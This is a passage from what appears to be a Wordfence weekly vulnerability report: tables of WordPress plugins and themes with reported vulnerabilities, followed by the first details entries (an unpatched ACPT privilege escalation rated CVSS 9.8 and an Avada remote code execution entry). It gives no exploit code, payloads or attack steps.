			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/infusedwooPRO" target="_blank" rel="noopener">infusedwooPRO</a>
		</td>
</tr>
<tr>
<td>JetBackup – Backup, Restore &amp; Migrate</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backup" target="_blank" rel="noopener">backup</a>
		</td>
</tr>
<tr>
<td>JetEngine</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-engine" target="_blank" rel="noopener">jet-engine</a>
		</td>
</tr>
<tr>
<td>Kadence Shop Kit</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kadence-shop-kit" target="_blank" rel="noopener">kadence-shop-kit</a>
		</td>
</tr>
<tr>
<td>Kali Forms — Contact Form &amp; Drag-and-Drop Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms" target="_blank" rel="noopener">kali-forms</a>
		</td>
</tr>
<tr>
<td>Kirki – Freeform Page Builder, Website Builder &amp; Customizer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kirki" target="_blank" rel="noopener">kirki</a>
		</td>
</tr>
<tr>
<td>KiviCare – Clinic &amp; Patient Management System (EHR)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kivicare-clinic-management-system" target="_blank" rel="noopener">kivicare-clinic-management-system</a>
		</td>
</tr>
<tr>
<td>LeadConnector</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/leadconnector" target="_blank" rel="noopener">leadconnector</a>
		</td>
</tr>
<tr>
<td>LearnPress – Sepay Payment</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress-sepay-payment" target="_blank" rel="noopener">learnpress-sepay-payment</a>
		</td>
</tr>
<tr>
<td>LearnPress – WordPress LMS Plugin for Create and Sell Online Courses</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress" target="_blank" rel="noopener">learnpress</a>
		</td>
</tr>
<tr>
<td>Like Button Rating <img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/2665.png" alt="&#x2665;" class="wp-smiley"> LikeBtn</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/likebtn-like-button" target="_blank" rel="noopener">likebtn-like-button</a>
		</td>
</tr>
<tr>
<td>Link Whisper Free</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/link-whisper" target="_blank" rel="noopener">link-whisper</a>
		</td>
</tr>
<tr>
<td>LiteSpeed Cache</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/litespeed-cache" target="_blank" rel="noopener">litespeed-cache</a>
		</td>
</tr>
<tr>
<td>LitExtension – Automated Store Migration &amp; Import</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/litextension-data-migration-to-woocommerce" target="_blank" rel="noopener">litextension-data-migration-to-woocommerce</a>
		</td>
</tr>
<tr>
<td>Magazine Blocks – Blog Designer, Magazine &amp; Newspaper Website Builder, Page Builder with Posts Blocks, Post Grid</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/magazine-blocks" target="_blank" rel="noopener">magazine-blocks</a>
		</td>
</tr>
<tr>
<td>MalCare WordPress Security Plugin – Malware Scanner, Cleaner, Security Firewall</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/malcare-security" target="_blank" rel="noopener">malcare-security</a>
		</td>
</tr>
<tr>
<td>ManageWP Worker</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/worker" target="_blank" rel="noopener">worker</a>
		</td>
</tr>
<tr>
<td>Mang Board WP</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mangboard" target="_blank" rel="noopener">mangboard</a>
		</td>
</tr>
<tr>
<td>MasterStudy LMS WordPress Plugin – for Online Courses and Education</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/masterstudy-lms-learning-management-system" target="_blank" rel="noopener">masterstudy-lms-learning-management-system</a>
		</td>
</tr>
<tr>
<td>Media Library Assistant</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/media-library-assistant" target="_blank" rel="noopener">media-library-assistant</a>
		</td>
</tr>
<tr>
<td>Media Sweep – WordPress Media Cleaner</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/media-sweep" target="_blank" rel="noopener">media-sweep</a>
		</td>
</tr>
<tr>
<td>MetForm – Contact Form, Survey, Quiz, Conditional Forms, Form Templates &amp; Custom Form Builder for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/metform" target="_blank" rel="noopener">metform</a>
		</td>
</tr>
<tr>
<td>miniOrange Social Login and Register (Discord, Google, Twitter, LinkedIn) Pro Addon</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-login-openid-2" target="_blank" rel="noopener">miniorange-login-openid</a>
		</td>
</tr>
<tr>
<td>Mobile App for WooCommerce: ShopApper Mobile App Builder Service for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mobile-app-for-woocommerce" target="_blank" rel="noopener">mobile-app-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>MStore API – Create Native Android &amp; iOS Apps On The Cloud</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mstore-api" target="_blank" rel="noopener">mstore-api</a>
		</td>
</tr>
<tr>
<td>Music Player for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/music-player-for-woocommerce" target="_blank" rel="noopener">music-player-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>MW WP Form</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mw-wp-form" target="_blank" rel="noopener">mw-wp-form</a>
		</td>
</tr>
<tr>
<td>My Agile Privacy® – CMP, Cookie Consent &amp; Privacy Tools</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/myagileprivacy" target="_blank" rel="noopener">myagileprivacy</a>
		</td>
</tr>
<tr>
<td>MyHome Core</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/myhome-core" target="_blank" rel="noopener">myhome-core</a>
		</td>
</tr>
<tr>
<td>NewPath WildApricotPress Add-on – Member Directory</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newpath-wildapricotpress-add-on-member-directory" target="_blank" rel="noopener">newpath-wildapricotpress-add-on-member-directory</a>
		</td>
</tr>
<tr>
<td>Newsletters</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newsletters-lite" target="_blank" rel="noopener">newsletters-lite</a>
		</td>
</tr>
<tr>
<td>Notifima – WooCommerce Stock Manager, Inventory Management, Waitlist</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-product-stock-alert" target="_blank" rel="noopener">woocommerce-product-stock-alert</a>
		</td>
</tr>
<tr>
<td>One User Avatar | User Profile Picture</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/one-user-avatar" target="_blank" rel="noopener">one-user-avatar</a>
		</td>
</tr>
<tr>
<td>Optimole – Optimize Images | Convert WebP &amp; AVIF | CDN &amp; Lazy Load | Image Optimization</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/optimole-wp" target="_blank" rel="noopener">optimole-wp</a>
		</td>
</tr>
<tr>
<td>Order Tip for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/order-tip-woo" target="_blank" rel="noopener">order-tip-woo</a>
		</td>
</tr>
<tr>
<td>OwnerRez</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ownerrez" target="_blank" rel="noopener">ownerrez</a>
		</td>
</tr>
<tr>
<td>Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile &amp; Restrict Content – ProfilePress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-user-avatar" target="_blank" rel="noopener">wp-user-avatar</a>
		</td>
</tr>
<tr>
<td>Passster – Password Protect Pages and Content</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/content-protector" target="_blank" rel="noopener">content-protector</a>
		</td>
</tr>
<tr>
<td>Pods – Custom Content Types and Fields</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pods" target="_blank" rel="noopener">pods</a>
		</td>
</tr>
<tr>
<td>Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program – myCred</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mycred" target="_blank" rel="noopener">mycred</a>
		</td>
</tr>
<tr>
<td>Post SMTP – Complete Email Deliverability and SMTP Solution with Email Logs, Alerts, Backup SMTP &amp; Mobile App</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/post-smtp" target="_blank" rel="noopener">post-smtp</a>
		</td>
</tr>
<tr>
<td>PPWP – Password Protect Pages</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/password-protect-page" target="_blank" rel="noopener">password-protect-page</a>
		</td>
</tr>
<tr>
<td>Privacy Policy Generator, Terms &amp; Conditions, GDPR, CCPA, Cookie Policy &amp; Disclaimer Templates – WPLP Legal Pages</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wplegalpages" target="_blank" rel="noopener">wplegalpages</a>
		</td>
</tr>
<tr>
<td>Project Manager – AI Powered Project Management, Task Management, Kanban Board &amp; Time Tracker</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wedevs-project-manager" target="_blank" rel="noopener">wedevs-project-manager</a>
		</td>
</tr>
<tr>
<td>Push Notification for Post and BuddyPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/push-notification-for-post-and-buddypress" target="_blank" rel="noopener">push-notification-for-post-and-buddypress</a>
		</td>
</tr>
<tr>
<td>Quiz and Survey Master (QSM) – Quiz Maker &amp; Survey Maker</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quiz-master-next" target="_blank" rel="noopener">quiz-master-next</a>
		</td>
</tr>
<tr>
<td>Rank Math SEO – AI SEO Tools to Dominate SEO Rankings</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/seo-by-rank-math" target="_blank" rel="noopener">seo-by-rank-math</a>
		</td>
</tr>
<tr>
<td>Realtyna Organic IDX plugin + WPL Real Estate</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/real-estate-listing-realtyna-wpl" target="_blank" rel="noopener">real-estate-listing-realtyna-wpl</a>
		</td>
</tr>
<tr>
<td>RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-registration-form-builder-with-submission-manager" target="_blank" rel="noopener">custom-registration-form-builder-with-submission-manager</a>
		</td>
</tr>
<tr>
<td>RepairBuddy – Repair Shop CRM &amp; Booking Plugin for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/computer-repair-shop" target="_blank" rel="noopener">computer-repair-shop</a>
		</td>
</tr>
<tr>
<td>RestrictMate – Restrict Page, Post and any Content ( Content Restriction and Membership Plugin)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/restrictmate" target="_blank" rel="noopener">restrictmate</a>
		</td>
</tr>
<tr>
<td>Return Refund and Exchange For WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-refund-and-exchange-lite" target="_blank" rel="noopener">woo-refund-and-exchange-lite</a>
		</td>
</tr>
<tr>
<td>Reviews and Rating – Google Reviews</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/g-business-reviews-rating" target="_blank" rel="noopener">g-business-reviews-rating</a>
		</td>
</tr>
<tr>
<td>Royal Addons for Elementor – Addons and Templates Kit for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/royal-elementor-addons" target="_blank" rel="noopener">royal-elementor-addons</a>
		</td>
</tr>
<tr>
<td>SAML Single Sign On – SSO Login</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-saml-20-single-sign-on-2" target="_blank" rel="noopener">miniorange-saml-20-single-sign-on</a>
		</td>
</tr>
<tr>
<td>Security Optimizer – The All-In-One Protection Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sg-security" target="_blank" rel="noopener">sg-security</a>
		</td>
</tr>
<tr>
<td>Shared Files Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shared-files-pro" target="_blank" rel="noopener">shared-files-pro</a>
		</td>
</tr>
<tr>
<td>Shared Files – File Upload &amp; Download Manager</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shared-files" target="_blank" rel="noopener">shared-files</a>
		</td>
</tr>
<tr>
<td>ShopEngine Elementor WooCommerce Builder Addon – All in One WooCommerce Solution with eCommerce Templates &amp; Woo Widgets</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shopengine" target="_blank" rel="noopener">shopengine</a>
		</td>
</tr>
<tr>
<td>SigmaForms Pro – AI Generated Forms</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sigmaforms-pro" target="_blank" rel="noopener">sigmaforms-pro</a>
		</td>
</tr>
<tr>
<td>Simple Newsletter Plugin – Noptin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newsletter-optin-box" target="_blank" rel="noopener">newsletter-optin-box</a>
		</td>
</tr>
<tr>
<td>Simple Payment</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-payment" target="_blank" rel="noopener">simple-payment</a>
		</td>
</tr>
<tr>
<td>Slider Hero with Video Background, Animation</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/slider-hero" target="_blank" rel="noopener">slider-hero</a>
		</td>
</tr>
<tr>
<td>Smart Marketing SMS and Newsletters Forms</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smart-marketing-for-wp" target="_blank" rel="noopener">smart-marketing-for-wp</a>
		</td>
</tr>
<tr>
<td>Smart Slider 3</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smart-slider-3" target="_blank" rel="noopener">smart-slider-3</a>
		</td>
</tr>
<tr>
<td>SmartAIPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smartaipress" target="_blank" rel="noopener">smartaipress</a>
		</td>
</tr>
<tr>
<td>SmilePass Selfie Login</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/selfie-login" target="_blank" rel="noopener">selfie-login</a>
		</td>
</tr>
<tr>
<td>SMS Alert – SMS &amp; OTP for WooCommerce, Order Notifications &amp; Abandoned Cart Recovery</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sms-alert" target="_blank" rel="noopener">sms-alert</a>
		</td>
</tr>
<tr>
<td>Smush – Image Optimization, Compression, Lazy Load, WebP &amp; CDN</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-smushit" target="_blank" rel="noopener">wp-smushit</a>
		</td>
</tr>
<tr>
<td>SOGO Add Script to Individual Pages Header Footer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/oh-add-script-header-footer" target="_blank" rel="noopener">oh-add-script-header-footer</a>
		</td>
</tr>
<tr>
<td>StoreGrowth – Upsell, BOGO, Quick View, Direct Checkout &amp; Side Cart for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/storegrowth-sales-booster" target="_blank" rel="noopener">storegrowth-sales-booster</a>
		</td>
</tr>
<tr>
<td>Stripe Payment Forms by WP Full Pay – Accept Credit Card Payments, Donations &amp; Subscriptions</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-full-stripe-free" target="_blank" rel="noopener">wp-full-stripe-free</a>
		</td>
</tr>
<tr>
<td>Suggestion Engine for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-suggestion-engine" target="_blank" rel="noopener">woo-suggestion-engine</a>
		</td>
</tr>
<tr>
<td>Super Store Finder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/superstorefinder-wp" target="_blank" rel="noopener">superstorefinder-wp</a>
		</td>
</tr>
<tr>
<td>SureFeedback Client Site</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/projecthuddle-child-site" target="_blank" rel="noopener">projecthuddle-child-site</a>
		</td>
</tr>
<tr>
<td>tagDiv Composer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/td-composer" target="_blank" rel="noopener">td-composer</a>
		</td>
</tr>
<tr>
<td>Tailored Tools</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tailored-tools" target="_blank" rel="noopener">tailored-tools</a>
		</td>
</tr>
<tr>
<td>Tamara Checkout</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tamara-checkout" target="_blank" rel="noopener">tamara-checkout</a>
		</td>
</tr>
<tr>
<td>The WP Remote WordPress Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpremote" target="_blank" rel="noopener">wpremote</a>
		</td>
</tr>
<tr>
<td>Throws SPAM Away</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/throws-spam-away" target="_blank" rel="noopener">throws-spam-away</a>
		</td>
</tr>
<tr>
<td>Tickera – Sell Tickets &amp; Manage Events</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tickera-event-ticketing-system" target="_blank" rel="noopener">tickera-event-ticketing-system</a>
		</td>
</tr>
<tr>
<td>TranslatePress – Translate Multilingual sites with AI Translation</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/translatepress-multilingual" target="_blank" rel="noopener">translatepress-multilingual</a>
		</td>
</tr>
<tr>
<td>Tutor LMS – eLearning and online course solution</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor" target="_blank" rel="noopener">tutor</a>
		</td>
</tr>
<tr>
<td>Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction &amp; Membership Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-member" target="_blank" rel="noopener">ultimate-member</a>
		</td>
</tr>
<tr>
<td>UpdraftPlus: WP Backup &amp; Migration Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/updraftplus" target="_blank" rel="noopener">updraftplus</a>
		</td>
</tr>
<tr>
<td>User Frontend – Membership, User Registration, User Profile, User Directory &amp; Content Restriction with Frontend Post Submission</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-user-frontend" target="_blank" rel="noopener">wp-user-frontend</a>
		</td>
</tr>
<tr>
<td>User Profile Builder – Beautiful User Registration Forms, User Profiles &amp; User Role Editor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/profile-builder" target="_blank" rel="noopener">profile-builder</a>
		</td>
</tr>
<tr>
<td>User Registration &amp; Membership – Free &amp; Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration &amp; Login Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration" target="_blank" rel="noopener">user-registration</a>
		</td>
</tr>
<tr>
<td>Visitor Traffic Real Time Statistics pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/visitors-traffic-real-time-statistics-pro" target="_blank" rel="noopener">visitors-traffic-real-time-statistics-pro</a>
		</td>
</tr>
<tr>
<td>WCFM Marketplace – Multivendor Marketplace for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wc-multivendor-marketplace" target="_blank" rel="noopener">wc-multivendor-marketplace</a>
		</td>
</tr>
<tr>
<td>WooCommerce Lottery</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-lottery" target="_blank" rel="noopener">woocommerce-lottery</a>
		</td>
</tr>
<tr>
<td>Workeera – AI Job Board with Applicant Tracking System (ATS)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/workeera-remote-tech-job-board" target="_blank" rel="noopener">workeera-remote-tech-job-board</a>
		</td>
</tr>
<tr>
<td>WP Courses LMS – Online Courses Builder, eLearning Courses, Courses Solution, Education Courses</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-courses" target="_blank" rel="noopener">wp-courses</a>
		</td>
</tr>
<tr>
<td>WP Data Access – App Builder for Tables, Forms, Charts, Maps &amp; Dashboards</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-data-access" target="_blank" rel="noopener">wp-data-access</a>
		</td>
</tr>
<tr>
<td>WP Fastest Cache – WordPress Cache Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-fastest-cache" target="_blank" rel="noopener">wp-fastest-cache</a>
		</td>
</tr>
<tr>
<td>WP Job Portal – AI-Powered Recruitment System for Company or Job Board website</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-job-portal" target="_blank" rel="noopener">wp-job-portal</a>
		</td>
</tr>
<tr>
<td>WP OAuth Server ( Login with WordPress )</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-oauth-20-server" target="_blank" rel="noopener">miniorange-oauth-20-server</a>
		</td>
</tr>
<tr>
<td>WP Rocket</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-rocket" target="_blank" rel="noopener">wp-rocket</a>
		</td>
</tr>
<tr>
<td>WP Ultimate CSV Importer – WordPress CSV, XML &amp; Excel Import</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-ultimate-csv-importer" target="_blank" rel="noopener">wp-ultimate-csv-importer</a>
		</td>
</tr>
<tr>
<td>WP w3all phpBB</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-w3all-phpbb-integration" target="_blank" rel="noopener">wp-w3all-phpbb-integration</a>
		</td>
</tr>
<tr>
<td>WPBulky – WordPress Bulk Edit Post Types</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpbulky-wp-bulk-edit-post-types" target="_blank" rel="noopener">wpbulky-wp-bulk-edit-post-types</a>
		</td>
</tr>
<tr>
<td>WPCafe – Restaurant Menu, Online Food Ordering &amp; Table Booking System</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-cafe" target="_blank" rel="noopener">wp-cafe</a>
		</td>
</tr>
<tr>
<td>wpForo Forum</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpforo" target="_blank" rel="noopener">wpforo</a>
		</td>
</tr>
<tr>
<td>WPMU DEV Dashboard</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpmudev-updates" target="_blank" rel="noopener">wpmudev-updates</a>
		</td>
</tr>
<tr>
<td>WPvivid — Backup, Migration &amp; Staging</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpvivid-backuprestore" target="_blank" rel="noopener">wpvivid-backuprestore</a>
		</td>
</tr>
<tr>
<td>爱采集数据采集和发布插件</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/icollect" target="_blank" rel="noopener">icollect</a>
		</td>
</tr>
</table>
<hr>
<h3>WordPress Themes with Reported Vulnerabilities Last Week</h3>
</p>
<table class="wfvr-list-table software-list">
<tr>
<th class="text-center w-50">Software Name</th>
<th class="text-center">Software Slug</th>
</tr>
<tr>
<td>Avada | Website Builder For WordPress &amp; WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/Avada" target="_blank" rel="noopener">Avada</a>
		</td>
</tr>
<tr>
<td>Betheme</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/betheme" target="_blank" rel="noopener">betheme</a>
		</td>
</tr>
<tr>
<td>CozyStay &#8211; Hotel Booking WordPress Theme</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/cozystay" target="_blank" rel="noopener">cozystay</a>
		</td>
</tr>
<tr>
<td>Newspapers X</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/newspapers-x" target="_blank" rel="noopener">newspapers-x</a>
		</td>
</tr>
<tr>
<td>Uncode</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/uncode" target="_blank" rel="noopener">uncode</a>
		</td>
</tr>
</table>
<hr>
<h3>Vulnerability Details</h3>
<p>Please note that if you run the Wordfence plugin on your WordPress site, with the scanner enabled, you should’ve already been notified if your site was affected by any of these vulnerabilities. If you’d like to receive real-time notifications whenever a vulnerability is added to the Wordfence Intelligence Vulnerability Database, <a href="https://www.wordfence.com/help/wordfence-intelligence-webhook-notifications/" target="_blank" rel="noopener">check out our Slack and HTTP Webhook Integration</a>, which is completely free to utilize.</p>
</p>
<div class="wfvr-vulnerabilities">
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/44c0c0a0-94a4-4394-b661-1ce53d63f789" target="_blank" rel="noopener">ACPT (Premium) &lt;= 2.0.63 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-32566" target="_blank" rel="noopener noreferrer">							CVE-2026-32566						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-custom-post-type" target="_blank" rel="noopener">ACPT (Premium)</a> <span class="wfvr-software-slug">[advanced-custom-post-type]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vdsec" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/a088a81982e769094818c68ff02325e8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a088a81982e769094818c68ff02325e8"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vdsec" target="_blank" rel="noopener">VDsec</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/44c0c0a0-94a4-4394-b661-1ce53d63f789" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5bef5bd3-8ec9-4a5b-bcdd-98952c7ef390" target="_blank" rel="noopener">Avada &lt;= 7.16 and Fusion Builder &lt;= 3.16 &#8211; Unauthenticated Remote Code Execution via Arbitrary File Write</a></h4>
